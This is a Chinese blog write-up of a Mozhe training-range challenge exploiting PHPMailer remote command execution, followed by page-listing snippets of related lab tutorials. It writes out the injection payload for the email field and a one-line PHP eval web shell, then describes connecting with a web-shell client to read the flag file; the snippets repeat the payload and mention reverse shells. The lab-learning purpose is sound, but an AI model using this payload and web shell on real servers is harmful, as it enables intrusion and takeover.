在线靶场-墨者-命令执行2星-PHPMailer远程命令执行漏洞溯源

最新推荐文章于 2024-06-13 08:34:49 发布
最新推荐文章于 2024-06-13 08:34:49 发布
阅读量344 收藏 1
点赞数
分类专栏: 在线靶场-墨者题目 文章标签: 墨者学院-靶场题目
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42079912/article/details/98968799
版权
本文通过墨者学院的在线靶场,介绍了如何利用PHPMailer的远程命令执行漏洞。首先,找到邮件测试页面,然后利用邮件注入木马,设置`-OQueueDirectory=/tmp/. -X/var/www/html/abc.php`和``的payload。接着,用菜刀连接并查找key文件,最终在/根目录下找到key.txt,提交key完成挑战。
摘要由CSDN通过智能技术生成

打开靶场网页,根据题意管理员留下的邮件测试页面。于是寻找邮件测试页面。
在这里插入图片描述
打开邮件测试页面。
在这里插入图片描述
使用邮件注入木马
You name:mozhe(随便输入)
Your email:“abc”. -OQueueDirectory=/tmp/. -X/var/www/html/abc.php @abc.com(abc可更改)
You message:<?php @eval($_POST[abc]);?>(abc可更改)

注入木马后打开菜刀进行连接。
在这里插入图片描述
在/var/www/html/下没看到key文件,在/根目录下发现key文件。打开key.txt文件得到key。把key提交即可完成本题。
在这里插入图片描述

笑棋
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院-PHPMailer远程命令执行漏洞溯源
qq_47094508的博客
07-01 909
拿到靶场之后点击访问分享一个小工具,用来爬取相关的url Link Gopher可以看到有用的就一个mail.php 进入之后来到一个邮件测试页面,很明显这里是一个功能点 phpmailer介绍PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)burp抓包,更改email处payload为 更改message处payload为 然后访问http://124.70.71.251
PHPMailer远程命令执行漏洞溯源
2303_76679642的博客
08-29 366
步骤3:burp抓包,更改email处payload为"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/1.php @aaa.com 更改message处payload为<?PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)步骤1:进入靶场,利用bp抓包,发现与后台交互的文件。步骤2:进入之后看到下面的页面,很明显是一个功能点。
Pikachu靶场-RCE远程命令/代码执行漏洞~保姆级教程!!!
2301_77360738的博客
05-16 396
全网最最最详细的Pikachu靶场远程命令/代码执行漏洞,看完包会,小白可入!!!
命令执行靶场实战
qq_23347209的博客
05-31 549
文章目录环境准备一、信息搜集1、nmap扫描2、使用nikto扫描网站目录二、漏洞利用测试三、nc反弹shell 环境准备 靶场下载地址:https://www.vulnhub.com/entry/depth-1,213/ 使用Vmware虚拟机中NAT网络 靶机: 192.168.146.153 攻击机 parrot 192.168.146.129 提示:以下是本篇文章正文内容,下面案例可供参考 一、信息搜集 1、nmap扫描 -A全面扫描 -p-全端口扫描 nmap -A -p- 192.168
橙子科技命令执行靶场
m0_71282722的博客
07-14 541
这个靶场有个坑,这个坑就是在根目录下有一个flag,所以体现了现ls的重要性。要查看文件先确定路径,但是主要是为了熟练命令执行手法。在这个靶场里可以一条路走到黑,但是多一种方法往往又是就多一种出路。
DVWA 靶场之 Command Injection(命令执行)原理介绍、分隔符测试、后门写入与源码分析、修复建议
Welcome To Myon'Blog !
02-26 3036
代替 localhost :在操作系统的配置文件中,通常将 localhost(本地主机名)与 127.0.0.1 绑定在一起,这样在应用程序中使用 localhost 时,实际上是在使用本地回环地址,用于访问本机上运行的网络服务和应用程序。在操作系统中,“ &、|、&&、|| ” 都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。:对服务器和应用程序进行安全配置,关闭不必要的服务和功能,限制可执行命令的范围。
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
1. **墨者靶场**:提供了黑盒和白盒环境下的命令执行与代码执行漏洞模拟,帮助测试和学习漏洞利用和防御。 2. **Javaweb-Struts2框架类RCE漏洞**:Struts2框架中的某些版本存在远程代码执行漏洞,通过精心构造的请求...
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
通关攻略墨者靶场 post ,DB2,绕过登录,sql注入四关
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
命令执行漏洞--ibos靶场靶场环境是掌控安全的)
xiesiyuan1的博客
02-27 1111
命令执行:用户传入的参数,会被当成系统指令来执行,指令内容用户可控,属于代码执行的一种ctrl+u:在view-source模式自动换行。
WEB安全实战(带靶场)–命令执行
renxq097的博客
12-27 1595
CTF靶场实验:命令注入
DVWA靶场01-系统命令执行漏洞利用及防护(Low/Medium/Hight)
AkangBoy的博客
11-11 3008
本文主要介绍了在DVWA靶场环境下系统命令执行漏洞的利用姿势,包括Low、medium、High三个级别
Pikachu靶场全级别通关教程详解
Karka_的博客
10-20 427
XSS是一种发生在Web前端的漏洞,所以其危害的对象主要是前端用户。XSS漏洞可以用来进行钓鱼攻击,前端js挖矿,获取用户cookie,甚至可以结合浏览器自身的漏洞对用户主机进行远程控制等Cross-site request forgrey简称为"CSRF"。在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接)然后欺骗目标用户进行点击,用户一旦点击这个请求,整个攻击也就完成了。因此CSRF攻击也被称为"one click"攻击。为什么小黑可以攻击成功呢?
pikachu靶场命令执行(RCE)通关教程)
记录学习
06-13 207
pikachu靶场之RCE通关教程
iwebsec靶场命令执行漏洞(全部)
qq_56041380的博客
04-09 457
应用程序的某些功能需要调用可以执行系统命令的函数,如果这些函数或者函数的参数被用户控制,就有可能通过命令连接符将恶意命令拼接到正常的函数中,从而随意执行系统命令,这就是命令执行漏洞。它属于高危漏洞之一。
DVWA靶场命令执行(Command injection)通关详解
weixin_56464045的博客
12-17 901
DVWA靶场 命令执行 Command injection 详解
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值